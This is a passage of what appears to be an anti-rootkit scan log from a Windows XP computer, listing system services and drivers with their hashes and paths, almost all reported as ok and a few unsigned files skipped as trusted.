20:17:14.0843 0x0ae0  [ D4991D98F2DB73C60D042F1AEF79EFAE, 58AF949EAEBF4FF3E3314DFB66CE4198BF65F0836B68CD27A6ED319742CCCCD2 ] EventSystem     C:\WINDOWS\system32\es.dll
20:17:15.0015 0x0ae0  EventSystem - ok
20:17:15.0062 0x0ae0  [ 38D332A6D56AF32635675F132548343E, E6909DB836AF679B4F4D62C7396D6C82769CC7ABB8C919C2AABFE934FCE268F6 ] Fastfat         C:\WINDOWS\system32\drivers\Fastfat.sys
20:17:15.0296 0x0ae0  Fastfat - ok
20:17:15.0375 0x0ae0  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
20:17:15.0453 0x0ae0  FastUserSwitchingCompatibility - ok
20:17:15.0515 0x0ae0  [ E97D6A8684466DF94FF3BC24FB787A07, 89E5A6889E3C5AB9AD3E80FFC16DD608278F3ADC282048B40B60196336A5CBEB ] Fax             C:\WINDOWS\system32\fxssvc.exe
20:17:15.0734 0x0ae0  Fax - ok
20:17:15.0765 0x0ae0  [ 92CDD60B6730B9F50F6A1A0C1F8CDC81, 8307A532AB4D05CBBCE206DC2759497708BF5AAA880BD00F0E4F281D8578A1F5 ] Fdc             C:\WINDOWS\system32\DRIVERS\fdc.sys
20:17:15.0937 0x0ae0  Fdc - ok
20:17:15.0968 0x0ae0  [ D45926117EB9FA946A6AF572FBE1CAA3, 4C94EF009D778BE0BDF8F812F026B96F91F641BE30AA2531427A5E63DBD280DA ] Fips            C:\WINDOWS\system32\drivers\Fips.sys
20:17:16.0125 0x0ae0  Fips - ok
20:17:16.0140 0x0ae0  [ 9D27E7B80BFCDF1CDD9B555862D5E7F0, 69C271AD5BCEBFD8AE5A769BDD7EC51256DA3A8ADAD5D12E5C0D13F4E82D8805 ] Flpydisk        C:\WINDOWS\system32\DRIVERS\flpydisk.sys
20:17:16.0296 0x0ae0  Flpydisk - ok
20:17:16.0328 0x0ae0  [ B2CF4B0786F8212CB92ED2B50C6DB6B0, 280F5CF8A90F7BEDE73ADD0DD0F8952088133A7CA9A3D3B7041957E33B36845D ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
20:17:16.0484 0x0ae0  FltMgr - ok
20:17:16.0546 0x0ae0  [ 8BA7C024070F2B7FDD98ED8A4BA41789, 47585006F86B2C6016EC54250A416794792D1E4024FF229C120BC25B684AF66A ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
20:17:16.0562 0x0ae0  FontCache3.0.0.0 - ok
20:17:16.0593 0x0ae0  [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A, EC635E071201A766845D48973772CBE0958942B4162F3F5F70660D114CC877E0 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:17:16.0796 0x0ae0  Fs_Rec - ok
20:17:16.0828 0x0ae0  [ 6AC26732762483366C3969C9E4D2259D, FF2C9A23CC17F380093F0BEA955B1925794271C2FEA16B9B7639668E6999BAE3 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys
20:17:17.0000 0x0ae0  Ftdisk - ok
20:17:17.0031 0x0ae0  [ 185ADA973B5020655CEE342059A86CBB, D3E352DFAF30761505480A4C557D980083F65EC5BD46E2656B2114D47B272A89 ] GEARAspiWDM     C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
20:17:17.0031 0x0ae0  GEARAspiWDM - ok
20:17:17.0062 0x0ae0  [ 0A02C63C8B144BD8C86B103DEE7C86A2, 7A3235DD3E1995DD72B212FAEB3ECA2A974434DE9BF6D269EA11BA65A80E7E50 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys
20:17:17.0218 0x0ae0  Gpc - ok
20:17:17.0281 0x0ae0  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
20:17:17.0296 0x0ae0  gupdate - ok
20:17:17.0312 0x0ae0  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
20:17:17.0328 0x0ae0  gupdatem - ok
20:17:17.0359 0x0ae0  [ 573C7D0A32852B48F3058CFD8026F511, BC384BBA394AFDCDA1A9ABC858C692AA84A1F0A31AF3DDF7F38D120C027927FB ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
20:17:17.0515 0x0ae0  HDAudBus - ok
20:17:17.0578 0x0ae0  [ 4FCCA060DFE0C51A09DD5C3843888BCD, D82417706B517F2610DDF7C86BE03A72EFA9A2A389DF5C8F8ADEAB8144E2C80A ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
20:17:17.0718 0x0ae0  helpsvc - ok
20:17:17.0750 0x0ae0  [ DEB04DA35CC871B6D309B77E1443C796, F66A15C9528D661940F1F4CA453B3E95036D68C74C3B8AB53644211DBD3D2F32 ] HidServ         C:\WINDOWS\System32\hidserv.dll
20:17:17.0890 0x0ae0  HidServ - ok
20:17:17.0921 0x0ae0  [ CCF82C5EC8A7326C3066DE870C06DAF1, 93395FA4C26B2E82DC8B7025ED3BCF583885E5D8C5F60CD6EEAA6335D6A126EC ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys
20:17:18.0078 0x0ae0  hidusb - ok
20:17:18.0109 0x0ae0  [ 8878BD685E490239777BFE51320B88E9, C5C3ECF6B049B6736E35B39518A8F830B45C45A88FFE8E3A6B7922AD946597E2 ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll
20:17:18.0250 0x0ae0  hkmsvc - ok
20:17:18.0265 0x0ae0  hpn - ok
20:17:18.0343 0x0ae0  [ 5DA42D24712E00728CEA2342A65009B2, 73EC5250DCFD556525B24B3CA66C64AC7747E77652A2AD6119936A59A9E8562A ] hpqcxs08        C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
20:17:18.0375 0x0ae0  hpqcxs08 - ok
20:17:18.0406 0x0ae0  [ D86A39BF100069444D026D22D9A6E555, 7B24D48D5BA67704C88697FADB64364E0E64D26259408E3C219820C5404C5EEC ] hpqddsvc        C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
20:17:18.0421 0x0ae0  hpqddsvc - ok
20:17:18.0453 0x0ae0  [ A04F4AC48895774A2CF9D1C9EAAACEF0, 012F10DE086C3551D75716EF1F6DCC477C8C1E776267D9FC4073BEADAFD37C9C ] HPSLPSVC        C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL
20:17:18.0500 0x0ae0  HPSLPSVC - ok
20:17:18.0546 0x0ae0  [ D03D10F7DED688FECF50F8FBF1EA9B8A, C19A733571BA831E24EE45EDB730FFFDBA22638F138A32A794BEAB8D8B71D8DD ] HPZid412        C:\WINDOWS\system32\DRIVERS\HPZid412.sys
20:17:18.0671 0x0ae0  HPZid412 - ok
20:17:18.0687 0x0ae0  [ 89F41658929393487B6B7D13C8528CE3, 5D06A11225A83F3F33417148BE53654080C88BFA876FEB486A7E43410AC99F23 ] HPZipr12        C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
20:17:18.0734 0x0ae0  HPZipr12 - ok
20:17:18.0765 0x0ae0  [ ABCB05CCDBF03000354B9553820E39F8, 6361B5A57CDE23AC5E987ACECF3BEE7AD51134C6E5BF4F833E512C9BC4B86877 ] HPZius12        C:\WINDOWS\system32\DRIVERS\HPZius12.sys
20:17:18.0828 0x0ae0  HPZius12 - ok
20:17:18.0890 0x0ae0  [ F80A415EF82CD06FFAF0D971528EAD38, 524D9E9201572929522F6805011783711B7C0F76308B924C89CF75F4B7A1FDF3 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys
20:17:18.0968 0x0ae0  HTTP - ok
20:17:19.0015 0x0ae0  [ 6100A808600F44D999CEBDEF8841C7A3, 61A75118C327812C60622010985A2E80E79B6FD9030A5732390EE5426E4AF6C9 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll
20:17:19.0171 0x0ae0  HTTPFilter - ok
20:17:19.0187 0x0ae0  i2omp - ok
20:17:19.0203 0x0ae0  [ 4A0B06AA8943C1E332520F7440C0AA30, DB2452390CCFE67E0C5FEB4FD42CA24ABE2DDD40D0B22DD5F5B8F70416863918 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys
20:17:19.0359 0x0ae0  i8042prt - ok
20:17:19.0437 0x0ae0  [ 88164BA0E3FC4172FF3A1BD82B756454, 678A6C5FD8254993D5ACDECAB24EF84E8C00875E8E310CA962EEB993C573906D ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
20:17:19.0531 0x0ae0  ialm - ok
20:17:19.0578 0x0ae0  [ 6F95324909B502E2651442C1548AB12F, FF1B104990FE186C6100ED229A45345FF695323AC778688EC11AA8F5A87B141E ] IDriverT        C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
20:17:19.0593 0x0ae0  IDriverT - detected UnsignedFile.Multi.Generic ( 1 )
20:17:22.0390 0x0ae0  Detect skipped due to KSN trusted
20:17:22.0390 0x0ae0  IDriverT - ok
20:17:22.0484 0x0ae0  [ C01AC32DC5C03076CFB852CB5DA5229C, A4D7749220B5BC965D96A267F1E02FE8284A230BA249109207BD4B9EA8DFAC96 ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
20:17:22.0609 0x0ae0  idsvc - ok
20:17:22.0625 0x0ae0  [ 083A052659F5310DD8B6A6CB05EDCF8E, 48D39B03FFB6FAA1529B774443BA12618AE3982D9F65A7B9D18F2269F78B31F4 ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys
20:17:22.0890 0x0ae0  Imapi - ok
20:17:23.0000 0x0ae0  [ 30DEAF54A9755BB8546168CFE8A6B5E1, 3936228CD3125C763ABFCB93E86E4B43838202BCC0913A28E84AC0263B43EE0D ] ImapiService    C:\WINDOWS\system32\imapi.exe
20:17:23.0406 0x0ae0  ImapiService - ok
20:17:23.0421 0x0ae0  ini910u - ok
20:17:24.0031 0x0ae0  [ FA9A9468F982835E99C1EC21257F7E60, 0A31307CDF8833FD9378B297F6860B36AF5FB535816145AAC8B9C907AECF4B17 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
20:17:24.0375 0x0ae0  IntcAzAudAddService - ok
20:17:24.0437 0x0ae0  [ 8C953733D8F36EB2133F5BB58808B66B, 555868F246D73652E998B0B1296476E42FCEDED30D646CC000F31ECE4EBC25E6 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys
20:17:24.0625 0x0ae0  intelppm - ok
20:17:24.0687 0x0ae0  [ 1663A135865F0BA6E853353E98E67F2A, 700D383F964EBF38D9B66A6C7966700F0DBE7C7AF77AAE2F67AF703E36C8116B ] IntuitUpdateServiceV4 C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
20:17:24.0703 0x0ae0  IntuitUpdateServiceV4 - ok
20:17:24.0734 0x0ae0  [ 3BB22519A194418D5FEC05D800A19AD0, F6662F440950596DC1382DD1DB5D7891CCEA30A6062BEA942C18445B5F0D8B16 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys
20:17:24.0921 0x0ae0  Ip6Fw - ok
20:17:24.0953 0x0ae0  [ 731F22BA402EE4B62748ADAF6363C182, 5C3BEBD008A5BE4DC2F92076FF41A10DDC01E10EC7E6552213CFA11970811848 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:17:25.0109 0x0ae0  IpFilterDriver - ok
20:17:25.0140 0x0ae0  [ B87AB476DCF76E72010632B5550955F5, E6E74D3A86A7917A8BAED44F8E97CCD2EB171E4E4B27E9907F60D1523FAF319A ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys
20:17:25.0265 0x0ae0  IpInIp - ok
20:17:25.0281 0x0ae0  [ CC748EA12C6EFFDE940EE98098BF96BB, AF523E21C25D9A1715EFEA573E4F52AF5D4FC9F28A2D613F5DB629C186C439E0 ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys
20:17:25.0484 0x0ae0  IpNat - ok
20:17:25.0562 0x0ae0  [ BC0EA61246F8D940FBC5F652D337D6BD, BF018317631937EED13136608831F526BE34AF7E59FEF4863E3EDD205C02E1A7 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
20:17:25.0609 0x0ae0  iPod Service - ok
20:17:25.0625 0x0ae0  [ 23C74D75E36E7158768DD63D92789A91, 394D296F38E7D8EFD91A6EEC301D9CE6AF910E35EB9819F1A9E3363863AEDFDC ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys
20:17:25.0906 0x0ae0  IPSec - ok
20:17:25.0937 0x0ae0  [ C93C9FF7B04D772627A3646D89F7BF89, 805FA48E7A46D4F10240BF880A2468F53DEA36E83004399228AB70DB7D20544A ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys
20:17:26.0187 0x0ae0  IRENUM - ok
20:17:26.0234 0x0ae0  [ 05A299EC56E52649B1CF2FC52D20F2D7, 2654619DB3E6D6C385B63AB02F87D4241C4F0250CC31383D1B3586917166C2DC ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys
20:17:26.0468 0x0ae0  isapnp - ok
20:17:26.0593 0x0ae0  [ 9ECF00E19736054E019C532AED8228FC, F5A64A8269EA3655BBD4850298F335C0BD30535258928ED7CE62A32A3363E60B ] JavaQuickStarterService C:\Program Files\Java\jre7\bin\jqs.exe
20:17:26.0656 0x0ae0  JavaQuickStarterService - ok
20:17:26.0671 0x0ae0  [ 463C1EC80CD17420A542B7F36A36F128, E3B11BA26AFEAFB50B0FC168EA07F6049DA6B88BCDDEEE20310602D7FC27A3A7 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys
20:17:27.0062 0x0ae0  Kbdclass - ok
20:17:27.0140 0x0ae0  [ 692BCF44383D056AED41B045A323D378, 1A99DEE83FFAF64E73067FC049C0A4CE07D94E4AE31EFA17B38CEFA9E41D67DC ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys
20:17:27.0312 0x0ae0  kmixer - ok
20:17:27.0343 0x0ae0  [ B467646C54CC746128904E1654C750C1, 3BD71BE3663EA23463D236D8A2A2E42DFA10C502BDB4B6E131FAF0FBA748219E ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys
20:17:27.0421 0x0ae0  KSecDD - ok
20:17:27.0453 0x0ae0  [ 3A7C3CBE5D96B8AE96CE81F0B22FB527, 0044F03132596A494448CCE5F3D6ECC12617BB4CF6BAE348F79D4DC40ACD6EE0 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll
20:17:27.0500 0x0ae0  lanmanserver - ok
20:17:27.0515 0x0ae0  [ A8888A5327621856C0CEC4E385F69309, B08B63300D824E35E31EEEA2C4C086DFA2C2A964CEDAE512E74D3D88AADAA2C1 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
20:17:27.0562 0x0ae0  lanmanworkstation - ok
20:17:27.0593 0x0ae0  [ A7DB739AE99A796D91580147E919CC59, EDF4E039BA277B0E6D66FEB0B28096E67D682C09DFC18ECECF062D9DCFB75ACF ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll
20:17:27.0796 0x0ae0  LmHosts - ok
20:17:27.0828 0x0ae0  [ 986B1FF5814366D71E0AC5755C88F2D3, E6AF051174531C24B38E73987755D366ABEC595476C6D17793E8DCCC73F55340 ] Messenger       C:\WINDOWS\System32\msgsvc.dll
20:17:28.0015 0x0ae0  Messenger - ok
20:17:28.0031 0x0ae0  [ 4AE068242760A1FB6E1A44BF4E16AFA6, 1FB771162B96AAF787AC24867B818DF8511F0780BB094FA9A38C11D8DBFE68BC ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys
20:17:28.0203 0x0ae0  mnmdd - ok
20:17:28.0234 0x0ae0  [ D18F1F0C101D06A1C1ADF26EED16FCDD, BA0837C7780BD8262E143E2935AFA63BE59C3C39EF56CB8608EED0F50AF070D4 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe
20:17:28.0406 0x0ae0  mnmsrvc - ok
20:17:28.0437 0x0ae0  [ DFCBAD3CEC1C5F964962AE10E0BCC8E1, B342CC9EC3729AB1AB4B5E2E99F890C1E0CA649162DE91F6768AB857B719E97B ] Modem           C:\WINDOWS\system32\drivers\Modem.sys
20:17:28.0609 0x0ae0  Modem - ok
20:17:28.0640 0x0ae0  [ 35C9E97194C8CFB8430125F8DBC34D04, 0C0FCE6B0A23FB0ECB92E1663E1C72D2DD5B177D82E04782957690B69530DB39 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys
20:17:28.0812 0x0ae0  Mouclass - ok
20:17:28.0843 0x0ae0  [ B1C303E17FB9D46E87A98E4BA6769685, 161A45488522055D0F0474ABEDA04DDD0B5DAC2411AF9154B15190BBD66E7153 ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys
20:17:29.0062 0x0ae0  mouhid - ok
20:17:29.0078 0x0ae0  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD, 2A5E15ED2C24C6C65EF2F7E1FD93374774076C9D8D451E4422561F4D269C012F ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys
20:17:29.0265 0x0ae0  MountMgr - ok
20:17:29.0328 0x0ae0  [ 4E9D8041D352A33332FD6F59A3A78B03, D4E6229B07EF9866993EEE4F6223DC7F1FF1108273FE14A3DC74E65C181DE56A ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
20:17:29.0906 0x0ae0  MozillaMaintenance - detected UnsignedFile.Multi.Generic ( 1 )
20:17:32.0562 0x0ae0  Detect skipped due to KSN trusted
20:17:32.0562 0x0ae0  MozillaMaintenance - ok
20:17:32.0640 0x0ae0  mraid35x - ok
20:17:32.0687 0x0ae0  [ 11D42BB6206F33FBB3BA0288D3EF81BD, 76ABCFB62C5AC549F58C231F72A99882CDEB74928104B77FE52554765C2B1A22 ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys
20:17:32.0890 0x0ae0  MRxDAV - ok
20:17:32.0937 0x0ae0  [ A137F1470499A205ABBB9AAFB3B6F2B1, FB4951727543030D9E6ED74149C3FAACE2CA9DA8C1B5F616301B30B858C724E8 ] MSDTC           C:\WINDOWS\system32\msdtc.exe
20:17:33.0125 0x0ae0  MSDTC - ok
20:17:33.0156 0x0ae0  [ C941EA2454BA8350021D774DAF0F1027, C940E978C7B66A713A0FDAB54B5F995DF59D089AFCD96221DD3222948CD49BBD ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
20:17:33.0453 0x0ae0  Msfs - ok
20:17:33.0468 0x0ae0  MSIServer - ok
20:17:33.0500 0x0ae0  [ D1575E71568F4D9E14CA56B7B0453BF1, 4ABE0E24786C0D39FA2B885447E56204CA6942FB175E534DCE675D7BCF0B176A ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:17:33.0703 0x0ae0  MSKSSRV - ok
20:17:33.0718 0x0ae0  [ 325BB26842FC7CCC1FCCE2C457317F3E, C07BE560513B1FB91D756494F0BA4AEEB2E1998DE0E1C21EE83DB1183B0CEE91 ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:17:33.0875 0x0ae0  MSPCLOCK - ok
20:17:33.0890 0x0ae0  [ BAD59648BA099DA4A17680B39730CB3D, 9AD4C7C94C186C8815D0BC75DCAFB962158DA6935A244BA243EDDDEB33F9816C ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
20:17:34.0062 0x0ae0  MSPQM - ok
20:17:34.0078 0x0ae0  [ AF5F4F3F14A8EA2C26DE30F7A1E17136, AC93A1E4ABB0D038B772E429015567E44CC2EDB66C54DBE23A5F98176FAC1520 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys
20:17:34.0234 0x0ae0  mssmbios - ok
20:17:34.0265 0x0ae0  [ DE6A75F5C270E756C5508D94B6CF68F5, FCC972DDC36C2C44D836913F10004C2C33B11C54DEFFF0C63E0FDF901D2F9261 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys
20:17:34.0312 0x0ae0  Mup - ok
20:17:34.0359 0x0ae0  [ 0102140028FAD045756796E1C685D695, 5335B8278418CA200E2772124F0602C3E15A5CAF2D5CC59F6785DFAABF339B09 ] napagent        C:\WINDOWS\System32\qagentrt.dll
20:17:34.0625 0x0ae0  napagent - ok
20:17:34.0656 0x0ae0  [ 1DF7F42665C94B825322FAE71721130D, FE0DCB728471465B39A42A7511F4133021FBA5DF88F88BCB5FE2FF34CFD713F9 ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys
20:17:34.0812 0x0ae0  NDIS - ok
20:17:34.0859 0x0ae0  [ 0109C4F3850DFBAB279542515386AE22, 4F6DB1E499AC853FD36FD603FBB6D3AC9BDCEB298C7FE1FB59A9236CB46729B2 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:17:34.0875 0x0ae0  NdisTapi - ok
20:17:34.0921 0x0ae0  [ F927A4434C5028758A842943EF1A3849, B1AA3AF150C05307461774925901789456B0CCCD03A5E71ADA4AB58455962BEE ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:17:35.0078 0x0ae0  Ndisuio - ok
20:17:35.0093 0x0ae0  [ EDC1531A49C80614B2CFDA43CA8659AB, 494042F790F33721328B4451E79842E21919681CC421A4F9633EC4D383E06097 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:17:35.0250 0x0ae0  NdisWan - ok
20:17:35.0265 0x0ae0  [ 2F597BB467E05B1FE3830EABD821B8E0, 141497F5A49D47CCE3C9289644F4BD838DCB238F6D8E847FC006652E21FE02AC ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
20:17:35.0312 0x0ae0  NDProxy - ok
20:17:35.0343 0x0ae0  [ A081CB6FB9A12668F233EB5414BE3A0E, EE2A1311B51D1FEBAF79F45E568A927D8EA7704AFC8495AED2D26927566F61E3 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
20:17:35.0343 0x0ae0  Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
20:17:38.0375 0x0ae0  Detect skipped due to KSN trusted
20:17:38.0375 0x0ae0  Net Driver HPZ12 - ok
20:17:38.0390 0x0ae0  [ 5D81CF9A2F1A3A756B66CF684911CDF0, 7989C36607CAEA17AFA2C1C9904145CA0714A54B9F712D9D4C1AB140D0B2CC0C ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
20:17:38.0656 0x0ae0  NetBIOS - ok
20:17:38.0703 0x0ae0  [ 74B2B2F5BEA5E9A3DC021D685551BD3D, 7932B71F98B4122BE88F576BF6D745A757AE378A48924B7F4358837B75640A82 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
20:17:38.0921 0x0ae0  NetBT - ok
20:17:38.0984 0x0ae0  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDE          C:\WINDOWS\system32\netdde.exe
20:17:39.0140 0x0ae0  NetDDE - ok
20:17:39.0171 0x0ae0  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe
20:17:39.0312 0x0ae0  NetDDEdsdm - ok
20:17:39.0343 0x0ae0  [ A4ABB21D13528D1BA3ABF484B2DF24FE, 2DC5CFB023D990FD5680859660108EA80FB320A882C5B4BBAA3A061D7C870F46 ] netfilter       C:\WINDOWS\system32\drivers\netfilter.sys
20:17:39.0375 0x0ae0  netfilter - detected UnsignedFile.Multi.Generic ( 1 )
20:17:42.0031 0x0ae0  Detect skipped due to KSN trusted
20:17:42.0031 0x0ae0  netfilter - ok
20:17:42.0062 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] Netlogon        C:\WINDOWS\system32\lsass.exe
20:17:42.0234 0x0ae0  Netlogon - ok
20:17:42.0265 0x0ae0  [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE, 4E0A67B3CC897E80D4B342FFE8B7B4CC4F6CA2EF2D34C136027A098B2E1C6166 ] Netman          C:\WINDOWS\System32\netman.dll
20:17:42.0453 0x0ae0  Netman - ok
20:17:42.0484 0x0ae0  [ D34612C5D02D026535B3095D620626AE, 1BBCCCBF49EB8807240A77DCB43C25C21682073CC5356594E2C4F53EF36BF657 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
20:17:42.0515 0x0ae0  NetTcpPortSharing - ok
20:17:42.0546 0x0ae0  [ E9E47CFB2D461FA0FC75B7A74C6383EA, 544136F5BFD4DC23D45E90F12FA48B82FD9EAEA9EAF3E0F5F0BD27E23D672C3E ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys
20:17:42.0703 0x0ae0  NIC1394 - ok
20:17:42.0750 0x0ae0  [ 943337D786A56729263071623BBB9DE5, B631B47C869FE4ACF46E4AA272435D9A9CA536E3349E3FFBB8602636FEE7AFD4 ] Nla             C:\WINDOWS\System32\mswsock.dll
20:17:42.0812 0x0ae0  Nla - ok
20:17:42.0843 0x0ae0  [ 3182D64AE053D6FB034F44B6DEF8034A, 4ADFC76965BA2A5F488E71789A4E4EA702A74AF42725F72130D1CA919406CF19 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
20:17:42.0984 0x0ae0  Npfs - ok
20:17:43.0031 0x0ae0  [ 78A08DD6A8D65E697C18E1DB01C5CDCA, E0E6F3ED05068E32F1D5C2D2B38CDEF4536B8656DB6756C66CF6B40B60C8F3DA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
20:17:43.0218 0x0ae0  Ntfs - ok
20:17:43.0234 0x0ae0  [ 7F1C1F78D709C4A54CBB46EDE7E0B48D, 52135D41983A9E9E1DCA250A63017076AE22AA06D77CCF2E5EF41154F958584A ] NTIDrvr         C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
20:17:43.0250 0x0ae0  NTIDrvr - detected UnsignedFile.Multi.Generic ( 1 )
20:17:46.0156 0x0ae0  Detect skipped due to KSN trusted
20:17:46.0156 0x0ae0  NTIDrvr - ok
20:17:46.0171 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe
20:17:46.0343 0x0ae0  NtLmSsp - ok
20:17:46.0375 0x0ae0  [ 156F64A3345BD23C600655FB4D10BC08, 9611BE411586E068D9297D77102DB3BE48AA67F1BAD6F61A84F83FC3043FA9CD ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll
20:17:46.0546 0x0ae0  NtmsSvc - ok
20:17:46.0578 0x0ae0  [ 73C1E1F395918BC2C6DD67AF7591A3AD, B21133A75253EC15E2DFF66D3B480AB1A7E1A2360476C810E7AA55D0F0EB08D4 ] Null            C:\WINDOWS\system32\drivers\Null.sys
20:17:46.0718 0x0ae0  Null - ok
20:17:46.0750 0x0ae0  [ B305F3FAD35083837EF46A0BBCE2FC57, 9D0E0E666D652D0FC9EAB97280A5D67AAF61D6B21929DF7CF8ED72A367720464 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
20:17:46.0890 0x0ae0  NwlnkFlt - ok
20:17:46.0921 0x0ae0  [ C99B3415198D1AAB7227F2C88FD664B9, DD8DA4B5E804F134AB9233859544C025062902DFC3E8FB8A09A67337A4E73F55 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
20:17:47.0062 0x0ae0  NwlnkFwd - ok
20:17:47.0187 0x0ae0  [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
20:17:47.0218 0x0ae0  odserv - ok
20:17:47.0265 0x0ae0  [ CA33832DF41AFB202EE7AEB05145922F, 9DD0089C2E13C7F81214C3B5A4A61276292052F9BBFEA7FCD0F6AA27815D5F95 ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys
20:17:47.0421 0x0ae0  ohci1394 - ok
20:17:47.0437 0x0ae0  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:17:47.0468 0x0ae0  ose - ok
20:17:47.0515 0x0ae0  [ 5575FAF8F97CE5E713D108C2A58D7C7C, 96D4595D19A78CCBE8B325A08780AC077AE5CC99642ACD72FB47AEAE8D344D3B ] Parport         C:\WINDOWS\system32\DRIVERS\parport.sys
20:17:47.0656 0x0ae0  Parport - ok
